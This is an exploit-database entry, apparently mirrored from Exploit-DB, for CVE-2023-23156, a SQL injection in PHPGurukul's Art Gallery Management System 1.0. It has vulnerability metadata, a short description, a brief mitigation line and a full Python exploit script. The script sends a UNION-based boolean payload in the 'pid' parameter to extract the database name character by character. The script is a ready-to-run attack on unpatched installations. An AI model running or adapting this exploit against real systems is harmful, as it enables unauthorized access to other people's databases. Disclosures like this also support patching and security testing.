header-logo
Suggest Exploit
vendor:
Art Gallery Management System Using PHP and MySQL
by:
Yogesh Verma
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Art Gallery Management System Using PHP and MySQL
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-23156
CPE: a:phpgurukul:art_gallery_management_system_using_php_and_mysql
Metasploit:
Other Scripts:
Platforms Tested: Windows/Linux
2023

Art Gallery Management System Project in PHP v 1.0 – SQL injection

This exploit is a SQL injection vulnerability in the Art Gallery Management System Project in PHP v 1.0. It allows an attacker to extract the current database name by sending a malicious payload to the vulnerable URL. The payload is crafted to extract the database name character by character.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

# Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
# Date: 31-01-2023
# Exploit Author: Yogesh Verma
# Vendor Homepage: https://y0gesh-verma.github.io/
# Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: Windows/Linux
# CVE : CVE-2023-23156



#!/usr/bin/python
import sys
import requests

tmp = requests.Session()
db_name = ""
database = ""
if len(sys.argv) == 2:
    url = sys.argv[1]
    for i in range(1, 7):
        for j in range(32, 126):
            sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
            data = {'pid': '-1' + sql_payload}
            r = tmp.get(url, params=data)
            if "Dimension : 1" in r.text:
                db_name += chr(j)
    database += db_name
    if len(db_name)>1:
        print('\n'+"Fetching current database :")
        print(database)
        print('\n'+"vulnerable to CVE-2023-23156")
    else:
        print("Not vulnerable to CVE-2023-23156")
else:
    print("Error: Please provide the URL as an argument.")
    print("Example: script.py https://example.com/single-product.php")

Navigation

Suggest Exploit

Services By CQR